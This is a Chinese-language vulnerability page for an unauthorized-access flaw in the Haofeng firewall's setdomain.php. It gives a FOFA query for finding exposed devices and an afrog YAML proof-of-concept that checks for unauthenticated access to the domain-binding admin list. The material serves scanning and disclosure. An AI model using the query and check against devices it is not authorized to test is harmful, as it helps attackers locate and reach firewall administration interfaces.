haofeng-firewall-setdomain-unauth: 皓峰防火墙 setdomain.php 越权访问漏洞

日期: 2025-09-01 | 影响软件: haofeng firewall | POC: 已公开

漏洞描述

FOFA:app="皓峰防火墙系统登录"

PoC代码[已公开]

id: haofeng-firewall-setdomain-unauth

info:
  name: 皓峰防火墙 setdomain.php 越权访问漏洞
  author: 你是猪
  severity: medium
  description: |
    FOFA:app="皓峰防火墙系统登录"
  reference: 
    - http://wiki.peiqi.tech/wiki/iot/%E7%9A%93%E5%B3%B0/%E7%9A%93%E5%B3%B0%E9%98%B2%E7%81%AB%E5%A2%99%20setdomain.php%20%E8%B6%8A%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /setdomain.php?action=list
    expression: response.status == 200 && response.body.bcontains(b'<title>皓峰系统管理平台</title>') && response.body.bcontains(b'域名绑定列表')  && response.body.bcontains(b'[修改]') && response.body.bcontains(b'[删除]')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/haofeng-firewall-setdomain-unauth.yaml

相关漏洞推荐